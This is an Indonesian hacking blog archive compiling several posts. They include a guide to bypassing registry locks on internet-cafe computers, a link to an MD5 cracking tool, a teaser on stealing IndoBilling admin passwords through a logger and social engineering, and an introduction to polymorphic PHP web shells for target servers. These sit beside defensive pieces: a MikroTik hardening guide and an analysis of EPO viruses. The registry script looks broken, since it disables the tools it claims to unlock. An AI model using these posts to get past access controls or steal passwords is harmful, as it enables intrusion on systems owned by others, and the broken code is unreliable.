Anda akan menjumpai bahwa saat seorang hacker sejati ingin membantu anda, mereka tidak akan menghormati anda jika anda meminta dengan menghiba-hiba segala sesuatu yang mereka ketahui.Pelajari beberapa hal untuk pertama kalinya. Tunjukkan bahwa anda telah mencoba, bahwa anda mampu belajar sendiri. Kemudian jumpailah seorang hacker dengan pertanyaan tersebut.Q: Dimana saya dapat berdialog dengan seorang hacker sejati?Baiklah, yang jelas bukan melalui IRC, saya yakin –- disana tidak ada satupun selain flamer dan cracker, sejauh yang saya ketahui. Cara terbaik adalah mencari suatu kelompok pengguna Linux atau Unix setempat untuk anda dan melakukan dialog dengan mereka (ada direktori halaman kelompok pengguna Linux di Sunsite).Q: Bahasa apa yang harus saya pelajari untuk pertama kali?HTML, jika anda tidak mengetahuinya. Ada banyak sumber, hype-HTML, buku panduan HMTL diluar sana, dan sebagainya. Salah satu yang terbaik adalah HTML: The Definitive Guide.Saat anda mulai melakukan pemrograman, saya sarankan memulainya dengan Perl atau Phython. C juga sangat penting, namun juga lebih sulit.Q: Bagaimana saya memulainya? Dimana saya bisa mendapatkan free UNIX?Disuatu tempat dihalaman ini saya sertakan petunjuk dimana mendapatkan Linux. Untuk menjadi seorang hacker anda perlu dorongan dan inisiatif dan kemampuan untuk mendidik diri anda sendiri. Mulailah sekarang…

Sumber : Wanchee100

Mengacak-acak Registry Warnet

2010-02-20T05:37:00.000-08:00

Yang merasa udah jadi Hacker gak usah di baca,,,,,,,

Sering gak waktu pergi ke warnet, lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas fin yang ada di warnet di comot, mau gunain dos eh di matiin trus Runnya di culik,,, ih... kesel gak ma warnet kayak gini, saya siih kesel banget, tapi untung aja yang jaga warnet sedikit cakep,,, hehehehehe...... tau sendirilah....

Tpi kadang-kadang stiap pergi ke warnet kayak gini kesel juga, user bener-bener semua di kunci dan salah satu kunci untuk membuka itu adalah REGISTRY. Lalu bagaimana jika ternyata Registry warnet di kunci, ckakakaka,,, untuk itu lah saya membuka wawasan anda melalui artikel ini. tidak perlu menjadi seorang expert untuk menjebol registry ini, di luar pakem engak juga tuh,,,

Memang sih ada tool yang bisa digunain untuk mendukung aksi kita ini, tetapi hampir di setiap warnet atau setiap komputer pasti ada kok, cuman sebuah program text editor sederhana seperti Notped, Wordpad, kalau mau Microsoft Word juga bisa,, giman udah gak sabarkan mengacak-acak warnet dengan 4 langkah mudah... ITS SHOW TIME!!!!

Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan code berikut ini ke text editor kalian :

------------------------[ cut here the code ]-----------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

; sekarang kode buat ngaktifin run
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]

; proses selesai
------------------------[ cut here the code ]-----------------------

Langkah kedua save kode dengan ekstensi REG, misalnya dengan nama mylove.reg atau terserah anda deh namanya pokoknya berekstensi REG

Langkah ketiga cukup klik hasil file yang anda simpan tadi. Kemudian lanjutkan dengan langkah keempat.

langkah terakhir reboot komputer anda, tpi jangan gunakan telunjuk sakti anda. Cukup dengan menggunakan kombinasi Ctrl+Alt+Del. Diharapkan anda tidak jantungan ketika Windows mengeluarkan popup. Pilih explorer lalu tekan EndTask, tunggu sebentar lalu akan muncul popup lagi, selanjutnya EndTask kan lagi.

Sekarang klik start lalu run dan ketikkan regidit. Zup........ regedit yang manis terbuka dan lakukan apa yang anda lakukan.... Saran ja, rubah ja RegisterOwner dan Organitation dengan nama anda, bukan apa apa... biasa ingin terkenal,,, hehehehe....

Met mencoba,,,,

Sumber : ebook-paktani.tk (JASAKOM)

PasswordsPro

2010-02-15T04:28:00.000-08:00

Md5 sehari-hari kita gunakan untuk mengenskrip data sebelum kita simpan ke dalam database. Namun kenyataannya md5 ini memiliki kelemahan. Enskripsi satu arah yang diciptakan tahun 1991 ini sebenarnya sejak tahun 1996 sudah dianjurkan untuk tidak digunakan lagi.

tool untuk nge-crack MD5 yang ada salt nya,,,

Download :

http://rapidshare.com/files/161284732/PasswordsPro.v2.4.4.1-DOA.rar

untuk keterangan cara penggunaannya bisa diliat disini :

http://www.youtube.com/watch?v=8N-fXuVfuyE

semoga bermanfaat...

Securing New RouterOs Router (MIKROTIK)

2010-02-12T04:48:00.000-08:00

Dokumen ini dirancang untuk perangkat RouterOs tapi yang tidak mempunyai konfigurasi, konfigurasi yang dijelaskan dalam tutorial ini dapat bekerja untuk router sudah dikonfigurasi tetapi harus hati-hati semoga yang diambil konfigurasi ini tidak mempengaruhi perangkat.
Harap membaca dan memahami seluruh dokumen sebelum mendaftar ke perangkat ini, kegagalan untuk melakukan hal ini dapat menyebabkan Anda tidak dapat mengakses perangkat.

Maksud dari dokumen ini untuk mengambil langkah-langkah yang diperlukan untuk mengamankan akses ke perangkat RouterOs sambil mempertahankan kemampuan untuk perangkat lain untuk berkomunikasi dan menggunakan layanan tertentu.

Tidak ada alasan lain bahwa hanya akses router dari BGP pada perangkat untuk memiliki akses penuh dan juga pengguna yang masuk ke dalam memantau sambungan nirkabel harus mempunyai akses tulis atau kemampuan untuk reboot / shutdown etc etc Dengan ini dalam pikiran Anda harus melihat area lain pada jaringan Anda dan bagaimana mereka asses setup / dikonfigurasi - mereka mungkin memerlukan perhatian untuk sepenuhnya aman jaringan anda secara keseluruhan.

The user's going to pick dancing pigs over security every time. — Bruce Schneier

1. Configuring Packages & Hardening Services

Selalu gunakan installasi minimal :

* Advanced-Tools
* Ntp
* Security
* System

Ini adalah paket untuk menginstal sistem dasar di mana Anda dapat menyimpan jam dalam sinkro dengan sumber eksternal, sebuah suite alat canggih yang memungkinkan pemantauan, pelaporan dan memungkinkan Anda untuk berbicara dengan router aman.

Anda harus berpikir tentang peranan yang tepat akan memiliki router sebelum anda mulai mengaktifkan lagi paket pada router, "it's a simple" nirkabel pemancar maka mengapa perlu diaktifkan DHCP atau tidak? Jika router adalah menjadi Ethernet berbasis firewall maka mengapa tidak perlu nirkabel diaktifkan. Hanya memungkinkan paket router perlu untuk melakukan pekerjaannya, jadi yang kita fikirkan adalah keadaan cukup aman pada router kita.

Secara default router bisa diakses mengguanakan :

* Telnet
* SSH
* HTTP
* Winbox
* FTP
* Mac-Telnet

Untuk itu maka gunakanlah 1 cara dengan cara menonaktifkan semuanya dan gunakan salah satu cara saja untuk masuk ke sebuah router, itu adalah cara yang aman.

/ip services print
maka akan memunculkan
Flags: X - disabled, I - invalid # NAME PORT ADDRESS CERTIFICATE
0 telnet 23 0.0.0.0/0
1 ftp 21 0.0.0.0/0
2 www 80 0.0.0.0/0
3 ssh 22 0.0.0.0/0
4 X www-ssl 443 0.0.0.0/0
none

untuk menonaktifkan gunakan perintah

/ip service disable

Anda telah mengkonfigurasi layanan yang Anda sukai sekarang saatnya untuk melihat cara lain untuk antarmuka dengan router, pertama adalah atas SNMP yang digunakan oleh banyak program untuk memonitor perangkat (Ie The Dude). SNMP dimatikan secara default dan jika anda memiliki cara lain monitoring perangkat ini aman untuk meninggalkan dinonaktifkan. Saya lebih suka menggunakan The Dude untuk memonitor jaringan, jadi saya akan pergi ke depan dan memungkinkan akses dan membantu mengatur beberapa bidang.

/snmp set enabled=yes location=”The Matrix” contact=neo@zion.org

SNMP di RouterOs 2,9 adalah membaca saja, sehingga hanya bahaya yang memungkinkan akses ke sana adalah bahwa tanpa firewall untuk menghentikan akses ada pada jaringan atau jika router memiliki alamat IP publik akan dapat melihat sinyal nirkabel, tingkat jaringan, dll.

Sekarang bahwa Anda memiliki dasar keamanan router keamanan dan sekarang adalah waktu untuk melihat pengguna yang mengakses router dan bahwa mereka memiliki hak istimewa atau tidak.

2. Users & Passwords

Secara default mikrotik akan mempunyai user akses adalah admin
maka gunakanlah kebijakan di kantor anda untuk mengetahui user mana yang harus memiliki privilage :

/user set admin password=putpasshere

Gunakalah hanya satu jalur masuk, contohnya gunakan winbox, dan matikan semua layanan yang berjalan diatas, ini berguna untuk melindungi diri dari attacker yang menggunakan ssh brute force, maupun telnet, dan ftp begitu juga menggunakan browser untuk masuk ke router anda. yang berikutnya adalah gunakan 1 komputer di jaringan lokal anda yang hanya bisa masuk router. ini mencegah dari banyak client yang ingin menggunakan router anda dari client menggunakan winbox, jadi meskipun client menginstall winbox dan mengetahui user dan password admin maka tidak akan bisa diijinkan masuk karena hanya IP anda yang bisa anda gunakan untuk masuk.

/user add name=badmin password=putpasshere group=full address=192.168.12.3/32

Setelah itu gunakan winbox untuk menyimpan user dan password anda.

3. Port Knocking

Di firewall kita akan meload ke router nanti kita bahas dibagi menjadi 2 bagian :
1. daftar alamat device yang bisa diakses router.
2. semua device yang lain punya batas waktu untuk akses ke router.

Satu hal bahwa semua perangkat lain yang hanya terbatas bagi mereka yang tidak memiliki Winbox / SSH / telnet akses ke router, yang kadang-kadang berarti Anda tidak bisa memasukinya. Salah satu cara untuk sementara membolehkan akses penuh ke router adalah port ketukan.port knocking RouterOs adalah salah satu cara untuk menambahkan alamat IP dinamis ke dalam daftar alamat untuk jumlah waktu yang ditentukan. Cara kerjanya adalah seperti ini.

client mengirim paket ke router dengan port 1337
router menambah ip client ke address list "temp" misalkan dengan waktu 15 menit.
client mengirim paket ke router degnen port 7331
router mengecek untuk melihat apakah IP client ada di address list "temp".
jika demikian maka router menambah IP address ke address list "safe" dengan waktu 15 menit.
client akan mengakses router selama 15 menit.

Jadi dengan ini client dibatasi waktu aksesnya ke router. ini membuat router lebih aman.
bagi yang belum punya softwarenya silahkan didownload di http://www.zeroflux.org

/proj/knock/files/knock-cygwin.zip

Knock.exe port:protocol port:protocol port:protocol…

Knock.exe 192.168.0.2 1337:tcp 7331:tcp

Meskipun fitur ini berguna namun dalam keamanan, dalam aturan firewall saya akan menunjukkan aturan yang digunakan untuk membuat sebuah port knocking, jika Anda keluar dari aturan ini maka tidak ada port knocking di router anda.

name>
4. Loading A Firewall

Yups sekarang saatnya kita membahas tentang firewall, sekarang router Anda sudah aman dari akses oleh password, tetapi password merupakan salah satu lapisan keamanan - bukan hanya lapisan. Script ini berdasarkan firewall digunakan pada router MT demo tetapi memiliki beberapa perubahan disana, hanya melindungi router dan tidak 'foward' dalam aturan firewall.

/ ip firewall filter
add chain=input protocol=tcp dst-port=1337 action=add-src-to-address-list address-list=knock \ address-list-timeout=15s comment="" disabled=no
add chain=input protocol=tcp dst-port=7331 src-address-list=knock action= add-src-to-address-list \ address-list=safe address-list-timeout=15m comment="" disabled=no

Pada peraturan setup port knocking, setup diatas digunakan pada contoh kami akan gunakan untuk menambahkan alamat IP agar 'aman'-daftar alamat ini adalah alamat yang digunakan dalam daftar ini firewall untuk mengizinkan penuh akses ke router.

add chain=input connection-state=established action=accept comment="accept established connection packets" disabled=no
add chain=input connection-state=related action=accept comment="accept related connection packets" disabled=no
add chain=input connection-state=invalid action=drop comment="drop invalid packets" disabled=no

Aturan ini hanya berlaku pastikan sambungan pergi ke router dan akan mematikan apapun yang tidak sah.

add chain=input src-address-list=safe action=accept comment="Allow access to router from known network" disabled=no

Aturan ini merupakan aturan yang memungkinkan akses penuh ke router untuk alamat IP tertentu, ini berisi daftar IP statis untuk masukan dari Anda akan selalu memiliki akses dan juga berisi IP dinamis dari orang-orang ditambah port knocking jika digunakan.

add chain=input protocol=tcp psd=21,3s,3,1 action=drop comment="detect and drop port scan connections" disabled=no
add chain=input protocol=tcp connection-limit=3,32 src-address-list=black_list action=tarpit \ comment="suppress DoS attack" disabled=no
add chain=input protocol=tcp connection-limit=10,32 action= add-src-to-address-list \ address-list=black_list address-list-timeout=1d comment="detect DoS attack" disabled=no

Ini adalah aturan dari sedikit reaktif ke DoS dan yang mencoba untuk menggunakan port scanner, port scan adalah menurun tetapi serangan DoS adalah 'tarpitted' dalam bahwa semua koneksi yang diperlambat bawah untuk meningkatkan penggunaan sumber daya pada perangkat penyerang.

add chain=input protocol=icmp action=jump jump-target=ICMP comment="jump to chain ICMP" disabled=no
add chain=input action=jump jump-target=services comment="jump to chain services" disabled=no

2 peraturan ini beralih ke rantai kita akan membuat, jumping adalah berguna karena memungkinkan Anda untuk kembali aturan yang sama di berbagai rantai (Ie Input dan Forward dapat beralih ke rantai yang sama dan menjalankan peraturan yang sama)

add chain=input dst-address-type=broadcast action=accept comment="Allow Broadcast Traffic" disabled=no
Broadcast membolehkan lalu lintas ke router, hal ini kadang-kadang diperlukan oleh hal-hal seperti NTP

add chain=input action=log log-prefix="Filter:" comment="" disabled=no
add chain=input action=drop comment="drop everything else" disabled=no
Dan ini merupakan aturan yang menolak semua akses ke router, lalu lintas jika belum diterima oleh aturan-aturan di atas maka akan drop.

add chain=ICMP protocol=icmp icmp-options=0:0-255 limit=5,5 action=accept comment="0:0 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=3:3 limit=5,5 action=accept comment="3:3 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=3:4 limit=5,5 action=accept comment="3:4 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=8:0-255 limit=5,5 action=accept comment="8:0 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=11:0-255 limit=5,5 action=accept comment="11:0 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp action=drop comment="Drop everything else" disabled=no

Aturan-aturan ini membentuk 'ICMP' rantai yang kami melompat dari prediksi, ia terbatas berbagai paket ICMP untuk menghentikan orang-orang yang ping flooding oleh attacker.

add chain=services src-address-list=127.0.0.1 dst-address=127.0.0.1 action=accept comment="accept localhost" disabled=no
add chain=services protocol=udp dst-port=20561 action=accept comment="allow MACwinbox " disabled=no
add chain=services protocol=tcp dst-port=2000 action=accept comment="Bandwidth server" disabled=no
add chain=services protocol=udp dst-port=5678 action=accept comment=" MT Discovery Protocol" disabled=no
add chain=services protocol=tcp dst-port=161 action=accept comment="allow SNMP" disabled=yes
add chain=services protocol=tcp dst-port=179 action=accept comment="Allow BGP" disabled=yes
add chain=services protocol=udp dst-port=5000-5100 action=accept comment="allow BGP" disabled=yes
add chain=services protocol=udp dst-port=123 action=accept comment="Allow NTP" disabled=yes
add chain=services protocol=tcp dst-port=1723 action=accept comment="Allow PPTP" disabled=yes
add chain=services protocol=gre action=accept comment="allow PPTP and EoIP" disabled=yes
add chain=services protocol=tcp dst-port=53 action=accept comment="allow DNS request" disabled=yes
add chain=services protocol=udp dst-port=53 action=accept comment="Allow DNS request" disabled=yes
add chain=services protocol=udp dst-port=1900 action=accept comment="UPnP" disabled=yes
add chain=services protocol=tcp dst-port=2828 action=accept comment="UPnP" disabled=yes
add chain=services protocol=udp dst-port=67-68 action=accept comment="allow DHCP" disabled=yes
add chain=services protocol=tcp dst-port=8080 action=accept comment="allow Web Proxy" disabled=yes
add chain=services protocol=ipencap action=accept comment="allow IPIP" disabled=yes
add chain=services protocol=tcp dst-port=443 action=accept comment="allow https for Hotspot" disabled=yes
add chain=services protocol=tcp dst-port=1080 action=accept comment="allow Socks for Hotspot" disabled=yes
add chain=services protocol=udp dst-port=500 action=accept comment="allow IPSec connections" disabled=yes
add chain=services protocol=ipsec-esp action=accept comment="allow IPSec" disabled=yes
add chain=services protocol=ipsec-ah action=accept comment="allow IPSec" disabled=yes
add chain=services protocol=udp dst-port=520-521 action=accept comment="allow RIP" disabled=yes
add chain=services protocol=ospf action=accept comment="allow OSPF" disabled=yes
add chain=services action=return comment="" disabled=no

Ini adalah layanan yang kami Izinkan setiap mengakses, karena Anda dapat melihat kebanyakan mereka dinonaktifkan secara default. Satu-satunya adalah layanan yang memungkinkan pribadi saya merasa harus selalu dapat diakses.

* Mac-Telnet
* Bandwidth Test Server
* MT Discovery

Semua layanan lainnya hanya boleh diaktifkan bila mereka merasa diperlukan, menjalankan script ini pada produksi router yang sudah dikonfigurasi akan menyebabkan ia terjatuh ke IPSec, BGP, dan EOIP a bunch dari layanan lainnya, jadi harus diperiksa aturan2 tersebut, jangan asal copy paste. Sekali lagi baca dengan teliti, dan seksama untuk menerapkan aturan ini.

5. Logging & Syslog

Nah penyimpanan yang melebihi 100 baris akan hilang di router. maka log sangat diperlukan untuk memantau semua jaringan.
berikut ini setting default log.

/system logging print
Flags: X - disabled, I - invalid
# TOPICS ACTION PREFIX
0 info memory
1 error memory
2 warning memory
3 critical echo

jadi yang terlihat adalah ketika terjadi booting ulang maka kita akan kehilangan semua log kita.
oleh sebab itu kita harus menanamnya di hardisk.

/system logging print
/system logging remove 0
/system logging remove 1
/system logging remove 2
/system logging remove 3

sekarang kita setup log beberapa ke disk.

/system logging add topics=critical action=disk
/system logging add topics=critical action=echo
/system logging add topics=error action=disk
/system logging add topics=warning action=disk
/system logging add topics=info action=memory

sekarang tinggal mau diset berapa, klo saya 300 baris log untuk memori tapi klo hardisk saya kasih 1000 baris log.

/system logging action print
/system logging action set 0 disk-lines=XXX
/system logging action set 1 disk-lines=XXX

atau sekarang bisa juga kita buat aturan bahwa log tidak di memori namun langsung tersimpan di hardisk, caranya adalah seperti dibawah ini :

/system logging action add target=disk disk-lines=XXX name=FirewallHits

Kemudian kita mengubah logging tindakan untuk menghentikan firewall clogging up log

/system logging print
/system logging set 0 topics=info,!firewall

Dan sekarang kita atur agar semua firewall hits mendapatkan dikirim ke sasaran baru.

/system logging add topics=firewall action=FirewallHits

sekarang tinggal ditentukan alamat IP mana file ini akan disimpan :

/system logging action print
/system logging action set 3 remote=192.168.0.3:514

Jangan lupa untuk menambahkan ': 514' di bagian akhir alamat IP seperti ini menentukan port yang digunakan. Setelah kami telah mengatur IP kita dapat maju dan menambahkan sebuah aturan untuk masuk ke semua daemon

/system logging add action=remote topics=info,warning,critical,firewall,error prefix="RouterId"

setelah itu periksalah tiap hari log tersebut, jangan hanya akan menjadi file sampah ya...

Under *nix-like OS kamu dapat melakukan (FreeBSD):

1. vi /etc/rc.conf

syslogd_enable="YES" # Run syslog daemon (or NO). syslogd_program="/usr/sbin/syslogd" # path to syslogd, if you want a different o syslogd_flags="" # Flags to syslogd (if enabled).
(By default into "syslogd_flags" set "-s" option. Don't forget remove it. The "-a" options are ignored if the "-s" option is also specified. See man syslogd. )

2. vi /etc/syslog.conf

+@ # syslog settings of current system +* # + *.* /var/log/mikrotik.log +*

3. /etc/rc.d/syslogd restart

6. NTP Sync & Misc.

Waktu itu harus disetting jangan lupa.. jangan2 belum diset time di compynya..

/system clock set time-zone=+12

kita juga harus mensetup NTP Client

/system ntp client set enabled=yes primary-ntp=192.168.0.2 secondary-ntp=192.168.0.3 mode=unicast

Sumber : JatimCrew

PHP Shell

2010-02-12T00:15:00.000-08:00

PHP Shell adalah sebuah shell dibungkus dalam naskah PHP. Ini adalah alat yang dapat Kita gunakan untuk mengeksekusi shell-perintah sewenang-wenang atau browse filesystem di server web. Ini menggantikan, untuk gelar, koneksi telnet yang normal, dan untuk tingkat yang lebih rendah sebuah koneksi SSH.

Kita menggunakannya untuk administrasi dan pemeliharaan website Kita, yang sering jauh lebih mudah dilakukan jika Kita dapat bekerja secara langsung pada server. Sebagai contoh, Kita dapat menggunakan PHP Shell untuk membongkar dan memindahkan file-file besar. Semua program baris perintah normal seperti id, free, du, df, dll ... dapat digunakan.

Getting Help

Silakan gunakan fasilitas SourceForge untuk memperoleh bantuan pada PHP Shell. Kita bisa mengirimkan laporan bug, bergabung dengan mailing list.

Inherent Limitations

Ada beberapa keterbatasan pada jenis program yang dapat berjalan. Tidak akan ada gunanya jika Kita memulai program grafis seperti Firefox atau bahkan berbasis konsol seperti vi. Semua program harus secara ketat program baris perintah, dan mereka tidak akan memiliki kesempatan untuk mendapatkan input pengguna setelah mereka telah diluncurkan.

Mereka mungkin juga harus mengakhiri dalam waktu 30 detik, karena ini adalah batas waktu standar yang dikenakan kepada semua skrip PHP, untuk mencegah mereka berjalan di loop tak terbatas. ISP Kita mungkin telah menetapkan batas waktu ini untuk sesuatu yang lain.

Tetapi Kita dapat mengandalkan semua kerang-fungsi normal, seperti pipa, output dan input redirection, dll ... (Tidak ada -selesai, meskipun :-)

Safe Mode

Safe Mode adalah nemisis PHP Shell. Jika PHP berjalan di Safe Mode maka PHP Shell biasanya tidak akan bekerja - menyesal. Silakan baca detail explaination dalam file KEAMANAN disertakan dalam distribusi PHP Shell.

Installation

PHP Shell adalah mudah untuk menginstal - men-download dan ekstrak itu dan mengkonfigurasi password. Hal ini dilakukan di config.php. Silakan baca file INSTALL yang disertakan untuk informasi rinci.

How to Use PHP Shell

Ketika kita mengarahkan browser Anda di PHP Shell Anda akan diminta untuk mengotentikasi diri sendiri. Secara default tidak ada username / password akan bekerja, jadi silakan pergi membaca INSTALL untuk informasi tentang cara menambahkan pengguna.

Kita sudah kembali? Baik. Masukkan username dan password dan tekan "Login".
Kita kemudian akan disajikan dengan cukup sederhana tidak banyak halaman yang berisi kecuali jendela besar dengan kursor berkedip-kedip di bagian bawah, menandakan bahwa itu siap untuk mematuhi perintah kita.

Tulis perintah dan tekan RET - atau sebaliknya, tekan tombol 'Execute Command' tombol jika Anda benar-benar ingin. Perintah akan dilaksanakan dan hasilnya akan menunjukkan di terminal. Kita dapat memasukkan perintah lain.

Untuk lebih tepatnya: terminal akan diperbarui dengan baris perintah yang baru saja kita dieksekusi, output dari perintah ke standard out (stdout), dan berikut ini bahwa setiap kesalahan keluaran dikirimkan ke stderr.

Perintah-perintah yang dijalankan relatif ke direktori kerja saat ini, yang ditulis di atas. Kita mengubah hal ini dengan normal 'cd' command.

Download

Versi terbaru dari PHP Shell adalah 2,1 dari 27 Desember 2005. Download sebagai

Phpshell-2.1.tar.bz2
Phpshell-2.1.zip

Tarball / zipfile berisi file-file ini:

phpshell.php: Ini adalah script yang Anda jalankan ketika Anda menggunakan PHP Shell.

config.php: Konfigurasi file dalam format INI.

pwhash.php: Password hashing script. Ini digunakan untuk menghasilkan password yang aman hashed yang harus anda gunakan untuk mencegah orang lain untuk mengenal sandi Anda dengan membaca file config.php.

ChangeLog: File ini menjelaskan perubahan-perubahan yang saya buat ke PHP Shell. Dengan membaca itu Anda akan selalu tahu kapan aku telah menambahkan fitur baru atau membuat bugfix, dan sifat dari fitur / bugfix.

README: Sekitar halaman ini.

INSTALL: Menjelaskan kepada anda bagaimana menginstal PHP Shell. Antara lain, ini menjelaskan bagaimana untuk mengubah proteksi password sehingga Anda dapat menggunakan PHP Shell.

Ingatlah bahwa sangat penting untuk memiliki PHP Shell dilindungi password, atau yang lain setiap orang akan dapat begitu mengintip ke file dan mungkin Anda juga dapat menghapus mereka! Harap meluangkan waktu untuk melindungi instalasi PHP Shell.

KEAMANAN: Sebuah panduan tentang keamanan terpisah dengan PHP pada umumnya dan PHP Shell pada khususnya. Jangan lupa baca ini juga, terutama jika Anda mendapatkan kesalahan aneh kembali dari PHP Shell.

COPYING: Standar GNU GPL.

Sumber : phpshell.sourceforge.net

Fighting EPO Viruses

2010-02-11T08:23:00.000-08:00

Artikel pendek ini menjelaskan apa yang disebut Entry Point Obscuring (EPO)teknik pengkodean virus, terutama melalui analisis langsung Win32.CTX.Phage virus. Kita harus mengetahui dasar-dasar IA-32 perakitan dan unsur-unsur utama dari Portable Executable (PE) struktur file untuk memahami artikel ini. Kita harus meninjau deskripsi Win32.CTX.Phage ditulis oleh Peter Szor dan Wason Han, karena artikel ini tidak mencakup semua fitur dari virus.

Mengapa EPO dan Win32.CTX.Phage

Entry-point menghalangi virus sangat menarik karena sangat sulit sifat deteksi, desinfeksi dan penghapusan. Saat ini teknik EPO digunakan dalam berbagai cara, dalam artikel ini kita pilih Win32.CTX.Phage yang sama lain seperti virus terkenal sebagai Win9x.Margburg (salah satu polimorfik Windows9x virus, yang pertama kali muncul di wildlist) dan Win9x.HPS. Virus ini dikenal karena sulit untuk mendeteksi dan sulit untuk bersihkan. Khususnya CTX.Phage melibatkan banyak teknik yang membuat proses desinfeksi sangat sulit, bahkan setelah virus sepenuhnya dipaham.

Teknik Memahami Entry Point Obscuring (EPO)

Ketika virus menginfeksi file, ia harus mencari cara untuk mencapai DNS dan dihukum mati. Sebagian besar file PE infectors menggunakan cara yang paling umum untuk melakukan hal ini - mereka hanya mengubah catatan-titik aplikasi yang terinfeksi dan membuatnya menunjuk pada tubuh virus. Contoh ditunjukkan di bawah ini.

Original EXE Infected EXE

Entry-point: 0x1000 (.code section) Entry-point: 0x6000 (.reloc section)

Aktivitas virus seperti itu sangat mudah untuk mendeteksi, sebagaimana biasanya menghasilkan file yang entry-point kode tinggal di luar bagian, dan karena itu ditandai sebagai mencurigakan oleh virus scanner. Berikut adalah beberapa contoh kode, yang mendeteksi jenis infeksi:

(checks if the 'entry-point section' is the last section):

// --- snip of scanner code ------------------------------------------------

...(snip)...

sections = pPE->FileHeader.NumberOfSections;

pSH = (PIMAGE_SECTION_HEADER)((DWORD)mymap+pMZ->e_lfanew + sizeof(IMAGE_NT_HEADERS));

while (sections != 0) {

if (IsBadReadPtr(&pSH,sizeof(PIMAGE_SECTION_HEADER)) == TRUE)

{

printf("[-] Error: Bad PE file\n");

goto error_mode4;

}

char *secname=(char *) pSH->Name;

if (secname == NULL) strcpy(secname,"NONAME");

startrange=(DWORD) pSH->VirtualAddress + pPE->OptionalHeader.ImageBase;

endrange=(DWORD) startrange + pSH->Misc.VirtualSize;

...(snip)...

if (pSH->VirtualAddress <= pPE->OptionalHeader.AddressOfEntryPoint && \

pPE->OptionalHeader.AddressOfEntryPoint <>VirtualAddress +

pSH->Misc.VirtualSize)

{

printf("[+] Checking call/jump requests from %s section (EP)\n",

secname);

pSHC = pSH;

}

pSH++;

sections--;

}

pSH--;

if (pSHC == NULL)

{

printf("[-] Error: invalid entrypoint\n");

goto error_mode4;

}

printf("[+] Starting heuristics scan on %s section...\n\n",pSHC->Name);

if (pSHC == pSH)

{

printf("[!] Alert: Entrypoint points to last section (%s) -> 0x%.08x\n",

pSH->Name,pPE->OptionalHeader.AddressOfEntryPoint +

pPE->OptionalHeader.ImageBase);

printf("[!] Alert: The file may be infected!\n");

printf("[+] No deep-scan action was performed\n");

goto error_mode4;

}

...(snip)...

// --- snip of scanner code ------------------------------------------------

Sebenarnya alasan mengapa teknik EPO dikembangkan adalah untuk menghindari pendeteksian virus scanner. An entry-point menutupi virus adalah virus yang tidak mendapatkan kontrol dari program host secara langsung. Biasanya, virus patch program host dengan melompat / panggil rutin, dan menerima kontrol seperti itu. Meskipun ada banyak variasi dari teknik EPO, dalam artikel ini kita akan melihat salah satu dari mereka secara rinci.

Sumber : Securityfocus

Belajar Membuat Shellcode

2010-01-30T04:50:00.000-08:00

Ni cuMan HasiL CoPas ja, Gw kagak ngerti yg gini2an,,,,,,,,,,,

Shellcode adalah kode yang digunakan dengan payload untuk mengeksploitasi komputer target. Biasanya shellcode dibuat untuk dapat mengontrol komputer, ataupun mendapatkan hak akses komputer target, atau yang lainnya. Shellcode dimasukkan kedalam kode exploit dengan tujuan membaypass fungsi suatu software, sehingga software tersebut tidak berjalan secara semestinya, melainkan menjalankan fungsi pada Shellcode.

Payload dalam dunia security yaitu pembawa exploit yang digunakan untuk mengeksekusi shellcode. Payload kemudian akan menjalankan shellcode yang dipilih pada target komputer untuk mendapatkan akses kedalam komputer tujuan (target).

Untuk lebih jelasnya silahkan baca2 di blog Gw yang ada [Disini]

Iseng Bermodal Notepad

2010-01-17T09:49:00.000-08:00

Bosen dengan belajar, mau iseng? Yuk, kita pakai cara sederhana saja untuk ngisengin teman kita sendiri. Tapi jangan anda coba trik ini di komputer anda, klo dicoba berarti anda mengisengin diri anda sendiri & dapat dibilang anda melakukan tindakan yang stup*d.. Hehe.. Wkwk..

Lets begin! Pastikan Anda Mengetik Dengan Benar Script Dibawah Ini! Copy Paste Kadang Tidak Berhasil Dikarenakan Perbedaan Tanda Petik ( ” ” ) Pada Notepad, Untuk Lebih Fix Bisa Pake TextPad..

Untuk lebih jelasnya silahkan baca di blog saya satu lagi [Disini]

Hack Indobilling (Pukulan Telak Bagi Billing Berbasis SQL)

2010-01-17T09:44:00.000-08:00

IndoBilling merupakan software Billing untuk warnet, game online maupun offline, persewaan komputer, kursus, rental pengetikan, laboratorium sekolahan, dll.

Nah, kali ada cara untuk mendapatkan password Admin dan Operator indoBilling. Tujuannya.. mmm.. apa ya.. ^^

Langkah 1

Download aplikasi indoLogger v1.0 (DISINI). Aplikasi mungil dengan ukuran 7 KB untuk membantu Anda mencuri Log IndoBilling. Jika sudah, kini kita akan melakukan sedikit social engineering ^_*

Untuk lebih jelasnya silahkan baca di blog saya satu lagi yang ada [Disini]

Membuat script PHP SHELL yang berpolymorphic untuk server target

2010-01-15T09:20:00.000-08:00

PHP SHELL ialah sebuah injection script di server website yang berguna untuk mendapatkan akses shell. Dengan sebuah shell kita bisa mendapatkan akses File I/O, database, atau bahkan sistem layaknya seperti hak seorang admin dalam mengelola websitenya. Karena begitu berbahayanya sebuah PHP SHELL di server, biasanya para root mematikan fungsi - fungsi penting PHP yang memiliki fungsi bumerang bagi servernya, seperti fungsi system(). Bahkan antivirus khusus server web pun menjadikan PHP SHELL sebagai target operasi utamanya, selain berbagai macam rootkit backdoor yang lainnya.

